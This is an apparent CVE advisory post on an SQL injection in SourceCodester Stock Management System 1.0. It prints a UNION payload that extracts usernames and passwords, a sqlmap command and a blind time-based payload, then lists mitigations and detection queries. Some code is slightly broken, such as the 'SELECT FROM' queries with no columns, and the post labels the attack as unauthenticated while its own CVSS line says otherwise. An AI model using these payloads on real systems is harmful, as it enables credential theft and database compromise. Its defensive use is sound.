SourceCodester Stock Management System 10, SQL Injection, CVE-2025-4806 (Critical)

By /

Listen to this Post

How CVE-2025-4806 Works

This vulnerability exploits improper input sanitization in the `/admin/?page=back_order/view_bo` endpoint of SourceCodester Stock Management System 1.0. The `ID` parameter is directly concatenated into an SQL query without validation, enabling attackers to inject malicious SQL payloads. Remote attackers can manipulate this parameter to execute arbitrary database commands, potentially compromising sensitive data, bypassing authentication, or gaining admin privileges. The flaw stems from missing prepared statements or parameterized queries in the PHP backend.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/28/2025

Prediction: Patch by 06/15/2025

What Undercode Say:

Exploitation

1. Payload Example:

/admin/?page=back_order/view_bo&ID=1' UNION SELECT 1,2,3,4,5,CONCAT(username,':',password),7 FROM users-- -

2. Automated Exploit:

sqlmap -u "http://target.com/admin/?page=back_order/view_bo&ID=1" --risk=3 --level=5

3. Blind SQLi Detection:

/admin/?page=back_order/view_bo&ID=1' AND (SELECT SLEEP(5))-- -

Mitigation

1. Patch Workaround:

$id = mysqli_real_escape_string($conn, $_GET['ID']); // Temporary fix

2. Full Fix:

$stmt = $conn->prepare("SELECT FROM back_orders WHERE id = ?");
$stmt->bind_param("i", $_GET['ID']);

3. WAF Rule:

location /admin/ {
modsecurity_rules 'SecRule ARGS_GET "@detectSQLi" "id:1000,deny,status:403"';
}

Analytics

  • Attack Surface: Remote, unauthenticated
  • CVSS 4.0: AV:N/AC:L/PR:L/UI:N/VC:L/VI:L/VA:L
  • Exploitability: Public PoC available
  • Impact: Full database compromise

Detection Commands

grep -r "$_GET['ID']" /var/www/html/admin/ Find vulnerable files

Log Analysis

SELECT FROM apache_logs WHERE request LIKE "%view_bo%ID=%27%";

Backup Restoration

mysqldump -u root -p stock_db > backup_prepatch.sql

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top